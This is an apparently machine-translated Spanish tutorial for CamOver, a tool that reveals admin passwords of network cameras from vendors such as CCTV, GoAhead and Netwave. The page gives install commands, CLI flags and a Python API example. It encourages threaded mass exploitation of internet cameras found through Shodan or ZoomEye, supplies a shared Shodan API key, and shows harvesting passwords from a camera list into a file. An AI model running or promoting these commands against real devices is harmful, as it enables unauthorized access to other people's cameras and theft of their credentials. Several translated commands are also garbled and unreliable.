Tutoriales

Una herramienta que permite la divulgación del PW de administrador de la cámara de red

CamOver es una herramienta de explotación de la cámara que puede revelar la contraseña de administrador de la cámara de red.

propiedades

  • Utiliza puntos débiles en los modelos de cámara más comunes, como CCTV, GoAhead y Netwave.
  • Optimizado para usar varias cámaras al mismo tiempo de una lista con subprocesos activados.
  • CLI y API fáciles de usar.

instalación

pip3 instalar git + https: //github.com/EntySec/CamOver

Uso básico

Para usarlo, simplemente escriba camover en tu terminal.

Uso: Camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [–shodan SHODAN][–zoomeye ZOOMEYE] [-p PAGES]CamOver es una herramienta de explotación de cámaras que permite revelar las cámaras de red.
Contraseña de administrador.
argumentos opcionales:
-h, –help Muestra este mensaje de ayuda y sale
-t, –threads Usa hilos para un trabajo más rápido.
-o SALIDA, –salida SALIDA
Envíe el resultado a un archivo.
-i ENTRADA, –entrada ENTRADA
Archivo de entrada con direcciones.
-a DIRECCIÓN, -Dirección DIRECCIÓN
Dirección única.
–Shodan SHODAN Clave API de Shodan para la explotación de dispositivos a través de Internet.
–Zoomeye ZOOMEYE Clave API de ZoomEye para usar dispositivos a través de Internet.
-p PÁGINAS, –PÁGINAS PÁGINAS
Número de páginas que le gustaría recibir de ZoomEye.

Ejemplos de

Uso de una sola cámara

Hackeamos mi cámara solo por diversión.

Camover -a 192.168.99.100

Explotación de cámaras de Internet

Intentemos usar el motor de búsqueda de Shodan para aprovechar las cámaras en Internet, también las usaremos -t para una utilización rápida.

Camover -t -shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

NOTA: Clave de API de Shodan dada (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) es mi clave de API PRO, puede usar esta clave o la suya propia. Utilice todos nuestros recursos de forma gratuita 🙂

Explotación de cámaras desde el archivo de entrada

Intentemos usar la base de datos abierta de cámaras. -t para una utilización rápida.

camover -t -i camera.txt -o passwords.txt

NOTA: Utiliza todas las cámaras en cameras.txt Enumérelos por dirección y guarde todas las contraseñas recibidas como passwords.txt.

Uso de API

CamOver también tiene su propia API de Python a la que se puede llamar importando CamOver en su código.

de Camover importar CamOver

Funciones básicas

Existen todas las funciones básicas de CamOver que se pueden utilizar para aprovechar una cámara en particular.

exploit(address) – Explotación de una sola cámara según la dirección indicada.

Ejemplos de

Uso de una sola cámara

de Camover importar CamOver
Camover = CamOver ()
creds = camover.exploit (‘192.168.99.100’)
Imprimir (crédito)

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba